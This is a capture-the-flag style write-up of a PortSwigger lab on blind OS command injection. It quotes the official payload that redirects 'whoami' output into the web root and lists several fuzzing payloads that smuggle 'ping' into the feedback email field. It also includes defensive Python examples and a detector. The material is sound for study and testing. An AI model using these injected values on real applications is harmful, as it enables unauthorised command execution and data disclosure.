PortSwigger Lab: Blind OS command injection with output redirection
Lab objective
This lab contains a blind OS command injection vulnerability in the feedback function.
The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
`/var/www/images/`
The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
To solve the lab, execute the `whoami` command and retrieve the output.
Official writeup
- Use Burp Suite to intercept and modify the request that submits feedback.
- Modify the `email` parameter, changing its value to: `email=||whoami>/var/www/images/output.txt||`
- Now use Burp Suite to intercept and modify the request that loads an image of a product.
- Modify the `filename` parameter, changing the value to the name of the file you specified for the output of the injected command: `filename=output.txt`
- Observe that the response contains the output from the injected command.
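The lab does not show the feedback handler's source, so the following is an added example and not the lab's own code: a hypothetical Python handler in the vulnerable shape the writeup exploits (user input joined into a command line that a shell will interpret) beside a hardened version (allow-listed input passed as a single argv element with no shell). `mail -s feedback` is an assumed stand-in for whatever the real handler runs; `shell_tokens` only tokenises the string the way a POSIX shell would, it executes nothing.

```python
import re
import shlex
from typing import List

# Taken from the official writeup: the value sent in the feedback form's
# email parameter.
PAYLOAD = "||whoami>/var/www/images/output.txt||"

# Hypothetical notification command (assumption: the lab does not disclose
# what the feedback handler actually runs).
COMMAND_PREFIX = ["mail", "-s", "feedback"]


def build_shell_command(email: str) -> str:
    """Vulnerable pattern: the user-supplied value is spliced into a string
    that would then be handed to subprocess.run(cmd, shell=True) or
    os.system(cmd). Only the string is built here; nothing is executed."""
    return " ".join(COMMAND_PREFIX) + " " + email


def shell_tokens(cmd: str) -> List[str]:
    """Tokenise the command line the way a POSIX shell would, keeping
    operators such as '||' and '>' as separate tokens so the boundary
    between the intended command and the injected one becomes visible."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    return list(lexer)


# Hardened form, step 1: allow-list the input. Only local-part and domain
# characters are accepted, so every metacharacter the injection relies on
# ('|', ';', '>' and newline) is rejected before any command is built.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_email(email: str) -> str:
    if len(email) > 254 or not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected feedback email")
    return email


def build_argv(email: str) -> List[str]:
    """Hardened form, step 2: return the argument vector to hand to
    subprocess.run(argv) (shell=False is the default). The email is one
    argv element, so even if a metacharacter slipped past validation it
    would reach the program as literal text, never as a shell operator."""
    return COMMAND_PREFIX + [validate_email(email)]


if __name__ == "__main__":
    print("shell sees:", shell_tokens(build_shell_command(PAYLOAD)))
    print("argv for a valid address:", build_argv("test@test.com"))
    try:
        build_argv(PAYLOAD)
    except ValueError as exc:
        print("hardened handler:", exc)
```

The token list makes the defect concrete: with `shell=True` the `||` after `feedback` ends the intended command, `whoami` becomes a second command, and `>` redirects its output into the web root, which is exactly the behaviour the writeup relies on. The hardened version removes both halves of the problem: the allow-list rejects the value, and an argv list gives the shell no chance to reinterpret it.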
Lab steps
- Enter the lab and click `Submit feedback` in the top-right corner

- Fill in the feedback form

- Capture the request with Yakit

- Fuzz the email parameter with command-injection (RCE) payloads

- Sort the requests by id in ascending order and look for a sudden jump in response delay

As the figure above shows, the delay jumps sharply between request 8 and request 9, so the separator in that payload is very likely a working command-injection separator
- Extract the candidate payloads
email=test%40test.com%0Aping+-c+5+127.0.0.1;
email=test%40test.com;ping+-c+5+127.0.0.1;
email=test%40test.com|ping+-c+5+127.0.0.1;
email=test%40test.com;ping+-c+5+127.0.0.1||
email=test%40test.com||ping+-c+5+127.0.0.1||
email=test%40test.com||ping+-c+5+127.0.0.1|
email=test%40test.com;ping+-c+5+127.0.0.1%0A
email=test%40test.com||ping+-c+5+127.0.0.1%0A
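As an added example that is not part of the original writeup, here is the detection logic a defender could run over feedback submissions: it decodes the form body, flags the shell metacharacters and the `ping -c` timing primitive that the candidate payloads above rely on, and separately checks the image endpoint's `filename` parameter for non-image names such as the `output.txt` used in the official writeup. The sample bodies are the eight payloads from this page plus two constructed benign submissions; the extra field names, the `sleep` signature and the extension allow-list are assumptions.

```python
import os
import re
from urllib.parse import unquote_plus
from typing import Dict, List

# Constructed sample set: the page's eight candidate payloads followed by two
# benign submissions for comparison.
SAMPLE_BODIES = [
    "email=test%40test.com%0Aping+-c+5+127.0.0.1;",
    "email=test%40test.com;ping+-c+5+127.0.0.1;",
    "email=test%40test.com|ping+-c+5+127.0.0.1;",
    "email=test%40test.com;ping+-c+5+127.0.0.1||",
    "email=test%40test.com||ping+-c+5+127.0.0.1||",
    "email=test%40test.com||ping+-c+5+127.0.0.1|",
    "email=test%40test.com;ping+-c+5+127.0.0.1%0A",
    "email=test%40test.com||ping+-c+5+127.0.0.1%0A",
    "email=test%40test.com&name=Alice&message=Great+shop",
    "email=o%27brien%40example.org&message=Order+%23123+arrived",
]

# Shell command separators and substitution syntax.
SHELL_META = re.compile(r"[;|&`\n\r]|\$\(")
# Timing primitives used to confirm blind injection by response delay
# (the page fuzzes with ping -c; sleep is the other common one, assumed here).
TIMING = re.compile(r"\b(ping\s+-c\s+\d+|sleep\s+\d+)\b")

# Extensions the product-image endpoint is expected to serve (assumption).
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp"}


def parse_form(body: str) -> Dict[str, List[str]]:
    """Decode an application/x-www-form-urlencoded body. Written by hand
    rather than with parse_qs so that ';' inside a value is never treated
    as a pair separator, whatever the Python version."""
    params: Dict[str, List[str]] = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def inspect_body(body: str, fields=("email", "name", "message")) -> List[dict]:
    """Return one finding per suspicious field value in the body."""
    findings = []
    for field in fields:
        for value in parse_form(body).get(field, []):
            reasons = []
            if SHELL_META.search(value):
                reasons.append("shell metacharacter")
            if TIMING.search(value):
                reasons.append("timing primitive")
            if reasons:
                findings.append({"field": field, "value": value, "reasons": reasons})
    return findings


def inspect_image_filename(filename: str) -> List[str]:
    """Flag a filename parameter that does not look like a catalog image:
    the retrieval half of this technique asks the image endpoint for the
    redirected output file, which has no image extension."""
    reasons = []
    if "/" in filename or "\\" in filename or ".." in filename:
        reasons.append("path separator or traversal sequence")
    ext = os.path.splitext(filename)[1].lower()
    if ext not in IMAGE_EXT:
        reasons.append("non-image extension %s" % (ext or "(none)"))
    return reasons


if __name__ == "__main__":
    for i, body in enumerate(SAMPLE_BODIES, 1):
        print(i, inspect_body(body) or "clean")
    for name in ("12.jpg", "output.txt"):
        print(name, inspect_image_filename(name) or "clean")
```

Both checks are cheap enough to run inline in a WAF rule or over request logs; the `filename` check in particular catches the retrieval step even when the injection itself was missed, and should be paired with the server-side fix of never serving files from a directory the application can write to.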
- Testing a payload on its own confirms that the email parameter is indeed vulnerable to command injection (RCE)

- Running `whoami` directly produces no output in the response

- Trying to exfiltrate the RCE result out of band via DNSLOG shows that the host has no outbound network access, so the next approach is to write the command output to a file. That means trying different write paths for the common web server types (Apache, Nginx, IIS):
I. Apache HTTP Server
1. Linux/macOS
- Default web root:
  - Ubuntu/Debian: `/var/www/html`
  - CentOS/RHEL: `/var/www/html`
  - macOS: `/usr/local/var/www`
- Configuration file:
  - Ubuntu/Debian: `/etc/apache2/apache2.conf`
  - CentOS/RHEL: `/etc/httpd/conf/httpd.conf`
  - macOS: `/usr/local/etc/apache2/2.4/httpd.conf`
2. Windows
- Default web root: `C:\Apache24\htdocs`
- Configuration file: `C:\Apache24\conf\httpd.conf`
II. Nginx
1. Linux/macOS
- Default web root:
  - Ubuntu/Debian: `/var/www/html`
  - CentOS/RHEL: `/usr/share/nginx/html`
  - macOS: `/usr/local/var/www`
- Configuration file:
  - Ubuntu/Debian: `/etc/nginx/sites-available/default`
  - CentOS/RHEL: `/etc/nginx/conf.d/default.conf`
  - macOS: `/usr/local/etc/nginx/nginx.conf`
2. Windows
- Default web root: `C:\nginx\html`
- Configuration file: `C:\nginx\conf\nginx.conf`
III. IIS (Internet Information Services)
Windows (all versions)
- Default web root: `C:\inetpub\wwwroot`
- Configuration file:
  - IIS 7+: `%WINDIR%\System32\inetsrv\config\applicationHost.config`
- Management tool: edited through the "Internet Information Services (IIS) Manager" GUI
PS: the information above was generated directly by a large language model
- The lab's home page contains many images, so look up their URLs directly

- Open any image in a new tab

- Construct a command that writes a file into the `/var/www/images` directory

- Requesting test.txt directly shows that the file was written successfully

- Read the current user name (`whoami`) the same way

- Lab completed

